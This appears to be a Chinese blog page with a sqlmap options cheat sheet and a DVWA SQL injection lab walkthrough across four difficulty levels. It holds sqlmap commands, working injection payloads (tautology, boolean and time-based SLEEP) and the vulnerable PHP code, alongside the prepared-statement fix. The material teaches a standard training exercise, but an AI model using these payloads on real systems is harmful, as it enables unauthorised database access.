发表更新tool / penetration Test1 分钟读完 (大约173个字)

something about sqlmap

sqlmap参数

  • sqlmap版本:[1.5.11#stable]

    参数 含义 备注
    -r 从文件中加载http请求 -r ~/target.txt
    –level 设置探测级别(1-5),1最低 –level=5 远端服务器性能增加
    –risk 设置风险级别(1-3),1最低 –risk=3 视情况酌情增加
    -p 指定注入点 -p id
    –dbs 指定探测数据库结构
    –second-url 指定结果渲染页面url –second-url=”http://target/url/"
    –batch 指定自动模式,需要手动确定的地方,全部使用默认选项

参数说明

–second-url

请求提交页面结果渲染页面分离,sqlmap无法获得注入结果。因此使用--second-url=xxx参数配置结果渲染页面url。

 
发表更新penetration Test / train5 分钟读完 (大约754个字)

something about DVWA - SQL Injection

DVWA

DVWA => 备份地址

SQL Injection(sql注入)

Low

  • sqlmap测试

    • 使用burpsuit拦截请求

    • 将请求保存为文本文件

    • 使用sqlmap对已保存的请求做sql注入

      1
      sqlmap -r ./sql.injection/sql.injection.low.txt --level=5 --risk=3 -p id

    • 根据sqlmap结果构造恶意注入

      1
      2
      3
      4
      # %27  => '
      # %3D  => =
      # id=1'or'1'='1
      http://train.com/dvwa/vulnerabilities/sqli/?id=1%27or%271%27%3D%271&Submit=Submit#

  • 源码分析

    • 直接从request中获取参数

      1
      2
      // Get input
      $id = $_REQUEST[ 'id' ];

    • 直接将参数拼接入SQL文中查询

      1
      2
      3
      // Check database
      $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
      $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

Medium

  • sqlmap测试

    • 使用burpsuit拦截请求

    • 将请求保存为文本文件

    • 使用sqlmap对已保存的请求做sql注入

      1
      sqlmap -r ./sql.injection/sql.injection.medium.txt --level=5 --risk=3 -p id --batch

    • 根据sqlmap结果构造恶意注入

      1
      2
      3
      # 构造的恶意`payload`
      # 将`post`参数内容提供为
      id=2 OR NOT 7336=7336

  • 源码分析

    • 直接从request中获取参数

      Low级别相同。

    • 对参数转义特殊字符

      使用mysqli_real_escape_string()函数转义特殊字符。

      1
      $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    • 直接将参数拼接入SQL文中查询

      1
      2
      $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
      // 再进行查询

High

High级别主要是提交请求页面结果渲染页面分离,此举主要为了防止sqlmap等自动化工具测试。 不过sqlmap--second-url=xxx参数,可以用来手动指定结果渲染页面url

  • sqlmap测试

    • 使用burpsuit拦截请求

    • 将请求保存为文本文件

    • 使用sqlmap对已经保存的请求做sql注入

      --second-url参数用于指定响应结果页面url

      1
      sqlmap -r ~/Documents/0pentest/sql.injection/sql.injection.high.txt --second-url="http://train.com/dvwa/vulnerabilities/sqli/"

    • 根据sqlmap结果构造恶意注入

  • 源码分析

    • 提交请求页面与响应结果渲染页面分开

      提交请求页面:

      1
      http://train.com/dvwa/vulnerabilities/sqli/session-input.php

      结果渲染页面:

      1
      http://train.com/dvwa/vulnerabilities/sqli/

      提交请求页面提交请求后会将参数内容放到session中。

    • session中获取参数

      1
      2
      // Get input
      $id = $_SESSION[ 'id' ];

    • 直接将参数拼接入SQL文中查询

      1
      2
      3
      // Check database
      $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
      // 再查询

    • 根据sqlmap结果构造恶意注入

      1
      2
      3
      # 构造的恶意`payload`
      # 将`post`参数内容提供为
      id=3' AND (SELECT 4198 FROM (SELECT(SLEEP(5)))Yudr) AND 'Jnep'='Jnep

Impossible

  • 源码分析

    • token中验证身份

      1
      2
      // Check Anti-CSRF token
      checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    • request中获取参数

      1
      2
      // Get input
      $id = $_GET[ 'id' ];

    • 判断参数是否为数字

      1
      2
      3
      4
      // Was a number entered?
      if(is_numeric( $id )) {
          // other statements
      }

    • 将参数转为int

      1
      $id = intval ($id);

    • 将参数以PDO的方式预编译进sql中进行查询

      1
      2
      3
      4
      5
      // Check the database
      $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
      $data->bindParam( ':id', $id, PDO::PARAM_INT );
      $data->execute();
      $row = $data->fetch();
 

归档

×